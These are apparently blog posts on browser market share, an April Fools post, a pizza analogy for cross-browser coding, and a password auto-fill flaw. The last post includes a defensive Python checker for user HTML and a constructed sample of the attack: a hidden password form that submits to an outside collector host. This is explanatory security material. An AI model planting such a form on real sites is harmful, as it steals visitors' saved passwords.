Two web browsers hit milestones on Net Applications’ stats for September: Safari has passed the 5% mark, hitting 5.07%, and Opera Mini has climbed onto the chart at 0.39%. That might not sound like much, but considering that nearly all web traffic is from desktop computers these days, for a mobile phone–only browser to reach that size is impressive.

A bit closer to home, this site is currently seeing 64.6% IE, 26.2% Firefox, 4.4% Safari, 1.2% Opera (which probably includes both the desktop and mini versions). Splitting IE into versions, we’ve got 35.9% IE6 and 28% IE7. We’re already at the point where IE6 users are a minority (albeit the largest one), and more than 50% of visitors are using something more modern.

I’m looking forward to the next 2 milestones: IE7 overtaking IE6, and Firefox overtaking IE6. Come to think of it, I’d really like to get rid of IE6. Its time has passed, and the web will be better off without it, just as it’s better off without Netscape 4.

I’ve been thinking about this for a while, but it’s time to refocus the Alternative Browser Alliance. Mozilla’s Asa Dotzler has referred to Firefox and Internet Explorer as the “mainstream browsers” for more than a year now, and it looks like that’s become true.

The web is no longer an IE monopoly. It’s become an IE/Firefox oligopoly. Firefox is no longer an alternative web browser. It’s sold out, its ads are everywhere, and it even allows people to build Firefox-only code.

So, starting today (April 1, 2007), the Alternative Browser Alliance will no longer promote Firefox.

So what will replace it? I thought about Opera, but most of its install base is on cell phones and PDAs, and we all know the mobile web browser is dead, right? Safari? Well, it turns out that WebKit is shutting down.

So the site will be putting its weight behind iCab. It’s as alternative as they come, and it’s guaranteed to remain that way (since it won’t run on Vista).

Update: Yes, it’s an April Fools joke.

When web designers switch from focusing on a single browser (usually Internet Explorer) to developing cross-browser sites (usually adding Firefox, sometimes Opera or Safari, ideally all three), they often find that things don’t work as expected in the “new” browser. This can be for a number of reasons, including:

  • Bugs or “missing” features in the new browser (whether incomplete support in the new browser, or proprietary features in the familiar browser).
  • Broken code on the website being handled differently.
  • Different defaults where behavior isn’t well-defined in the specifications.

A big problem is that when you get into the code, a lot of pages aren’t as specific as the authors think they are. When you write code and test it on one browser, you’re not testing that the code is correct, you’re testing that that browser makes the same assumptions you do.

It’s like ordering pizza.

No, really. Let’s say Internet Explorer specializes in Chicago-style pizza, with a thick, chewy crust. And let’s say Firefox specializes in New York-style pizza, with a thin crust. But each can make the other style of pizza on request.

So you call up Internet Explorer and ask for pizza. They deliver you Chicago pizza, and if that’s what you wanted, you figure your order is fine. If you actually wanted New York style, you make sure that next time, you tell them you want that style of pizza.

But let’s say you like Chicago pizza. You get used to calling up IE and just asking for “pizza,” until one day you’re busy, and ask your roommate to order it. He likes to get his pizza from Firefox, so he calls them up, asks for “pizza,” and you get New York style. That’s not what you wanted. Obviously, Firefox pizza is inferior, because they got the order wrong! Well, no, it’s not, and no, they didn’t. They delivered what they were asked for. If you’d told your roommate to ask for Chicago style, Firefox would have been perfectly happy to deliver that style of pizza.

The moral of the story: always be specific with your code. Make sure it’s asking for what you think it’s asking for (validation helps here). And if something doesn’t do what you expect, make sure you didn’t leave that expectation out of your order.

See also: No, Internet Explorer did not handle it properly

(Expanded from a comment I posted at Mozillazine.)

ISC is reporting a new type of vulnerability in web browsers that the discoverer has termed “Reverse Cross-Site Request,” or RCSR.

Basically, on a site with user-generated content—like a hosted blog—it’s possible to add a form that looks like the site’s login form. If the victim has an account on the same site, and has asked their browser to save their password, it will auto-fill the form. If the attacker can somehow trick the visitor into submitting the form—say, with an invisible image submit button (ever clicked randomly? Or to get back to the page after looking at another window?)—the attacker gets the visitor’s password.

What’s new about this is that all it requires is plain HTML, not scripting, which most blog hosts and similar sites already block.
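Because the attack needs only plain HTML, a host's filter for user content has to look at form markup as well as scripts. A check of that kind, as an added example (not code from the ISC article or the bug report; the host names `blog.example` and `collector.example` and the sample comment are constructed):

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAudit(HTMLParser):
    """Record form markup found in user-submitted HTML."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}
        if tag == "form":
            # A relative action has no hostname and stays on the site.
            host = urlparse(a.get("action", "")).hostname
            if host and host != self.site_host:
                self.findings.append(("off-site form action", host))
            else:
                self.findings.append(("form element", a.get("action", "")))
        elif tag == "input":
            kind = a.get("type", "text").strip().lower()
            if kind == "password":
                # The field a password manager would auto-fill.
                self.findings.append(("password field", a.get("name", "")))
            elif kind == "image":
                # A submit control that can be drawn as any image.
                self.findings.append(("image submit button", a.get("src", "")))


def audit_user_html(html, site_host):
    """Return (finding, detail) tuples; an empty list means no form markup."""
    parser = FormAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a comment as a blog host might receive it.
SAMPLE_COMMENT = """<p>Great post!</p>
<form action="https://collector.example/log" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="image" src="/img/spacer.gif" width="1" height="1">
</form>"""

if __name__ == "__main__":
    for finding, detail in audit_user_html(SAMPLE_COMMENT, "blog.example"):
        print(f"{finding}: {detail}")
```

A host that allows no forms in user content can reject or strip any submission for which the result is non-empty.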

Chapin Information Services discovered the bug in Firefox 2, and reported it to Mozilla. It turns out that Internet Explorer 6 and 7 are also vulnerable, but only if the fake form is on the same page as the real login form. Mozilla is currently trying to determine the best way of resolving the problem without breaking all the passwords people have already saved. The ISC article links to the bug report, so you can follow the discussion. Microsoft has only said that they’re “aware of the issue.”

At the moment, I’m glad I don’t let web browsers save my passwords.